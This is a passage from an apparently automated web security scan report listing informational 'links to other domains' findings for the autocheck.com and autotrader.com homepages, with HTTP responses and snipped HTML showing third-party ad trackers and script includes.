   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>



   <img src='http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912323426' width='0' height='1' border='0' />


...[SNIP]...

20.559. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.autocheck.com/?WT.mc_id=1824&siteID=1824

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?
http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?
http://www.autocheckmembers.com/
http://www.experian.com/corporate/about-experian.html
http://www.experian.com/corporate/legalterms.html
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&guid=ON&script=0
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:12 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
Set-Cookie: JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 29237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...
<link rel="stylesheet" href="/consumers/stylesheets/autocheck.css" type="text/css" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css" />


...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&guid=ON&script=0"/>
</div>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/about-experian.html">About
                       Experian</a>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/legalterms.html">Site Terms &
                       Conditions</a>
...[SNIP]...
<li>
                   <a href="http://www.autocheckmembers.com">Visit Our
                       Dealer Site</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js"></script>
...[SNIP]...

20.560. http://www.autotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.autotrader.com/?LNX=PTRDRFYCHP

The response contains the following links to other domains:

http://autotrader.mediaroom.com/
http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295913396727&kd=autotraderhomepage
http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?
http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?
http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295913396728?yumehomepage
http://www.allapprovedcars.be/
http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links
http://www.autotraderlatino.com/?LNX=ATCAMHMPGBUSC
http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_73307.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500
http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500
http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500
http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500
http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500
http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500
http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500
http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
http://www.autotraderstatic.com/no_cache/bi_audit?Log=0
http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500
http://www.carmony.co.uk/
http://www.dealsonwheels.com/
http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050
http://www.nadaguides.com/partner.aspx?adid=167244

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:36 GMT
Server: Apache
Set-Cookie: JSESSIONID=D8688EFFE53F931FE65BCB1B8CD8B924; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:36 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=691168778.61475.0000; path=/
Content-Length: 60562

<!DOCTYPE html P
...[SNIP]...
<link rel="alternate" media="handheld" xhref="http://m.autotrader.com/" />

<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500" type="text/css" />

<style type="text/css">
...[SNIP]...
</style>

<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
</form>
<img id="fyc-corner-top" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500" class="iePNG"/>
<img id="fyc-corner-bottom" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500" class="iePNG"/>

<ul id="fyc-nav" class="clearfix"></ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
px%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=71015_1_TIMOFREASIER', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500" alt="Trade In Marketplace" title="Trade In Marketplace" width="440" height="248"/></a>
...[SNIP]...
mage" href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=77599_2_FYCNEWFNDNOW', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500" alt="Find New Cars" title="Find New Cars" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/research/new-cars/index.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76769_3_RESNEWFEELNG', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500" alt="New Car Research" title="New Car Research" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/top-tech.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76470_4_RESTPCTOPTEC', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500" alt="Top Car Tech" title="Top Car Tech" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/about/mobile-faq.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76859_5_MBLFAQPC2PKT', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500" alt="Mobile Phone" title="Mobile Phone" width="440" height="248"/></a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500" width="69" height="43" alt="Trade In Marketplace" title="Trade In Marketplace" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500" width="69" height="43" alt="Find New Cars" title="Find New Cars" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/research/new-cars/index.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500" width="69" height="43" alt="New Car Research" title="New Car Research" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/top-tech.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500" width="69" height="43" alt="Top Car Tech" title="Top Car Tech" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500" width="69" height="43" alt="Mobile Phone" title="Mobile Phone" class="thumb iePNG"/></a>
...[SNIP]...
<a href="http://www.autotrader.com/top-tech.jsp?rdpage=HPT2PROMO" >
<img id="tab-ad-one-promo-img" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_73307.jpg?v=3.17.167500" width="300" height="100" alt="Top Car Tech" />
</a>
...[SNIP]...
<li><a class="external-link" href="http://www.nadaguides.com/partner.aspx?adid=167244" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDMGNA1227', 'rdpage=HPTABRCH'], true).send();" title="Car valuation">What's my car worth?</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx">
<img src="http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500" alt="Trade-In Marketplace"/>
</a>
...[SNIP]...
<div class="module-seperator">
<img src="http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500" alt="" />
</div>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500" alt="SYC Center"/>
</a>
...[SNIP]...
<li id="autotrader-classics">

<a class="external-link" href="http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNTO1107'], true).send();">
<img src="http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500" alt="" id="atcClassic-logo"/>
<span>
...[SNIP]...
<div id="autotrader-classics-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
<li id="auto-mercado">

<a class="external-link" href="http://www.autotraderlatino.com?LNX=ATCAMHMPGBUSC" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNFC737'], true).send();">
<img id="atcLatino-logo" src="http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500" alt=""/>
<span>
...[SNIP]...
<div id="autotrader-latino-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
</script>

<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;" id="atcDealsOnWheels-logo" src="http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500" alt=""/>
<div style="float: left;cursor:pointer;" id="dow_text">
...[SNIP]...
</a>
<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;padding-left:6px;padding-top:4px;" src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" id="dow_offsite"/>
</a>
...[SNIP]...
</div>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500" />

<div id="intlRedirectModal">
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.carmony.co.uk">
<img src="http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500"/>Take me to Carmony.co.uk, AutoTrader.com®'s sister site, to look for cars in the U.K.
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.allapprovedcars.be">
<img src="http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500"/>Take me to AllApprovedCars.be, AutoTrader.com®'s sister site, to look for cars in Belgium
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div style="display:none;"><img src="http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295913396727&kd=autotraderhomepage" width="0" height="0" alt="Adify"/></div>

<div style="display:none;"><img src="http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295913396728?yumehomepage" width="0" height="0" alt="YuMe"/></div>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.561. http://www.autotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.autotrader.com/?LNX=PTRDRFYCHP

The response contains the following links to other domains:

http://autotrader.mediaroom.com/
http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295964847034&kd=autotraderhomepage
http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?
http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?
http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295964847034?yumehomepage
http://www.allapprovedcars.be/
http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links
http://www.autotraderlatino.com/?LNX=ATCAMHMPGBUSC
http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_64859.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500
http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500
http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500
http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500
http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500
http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500
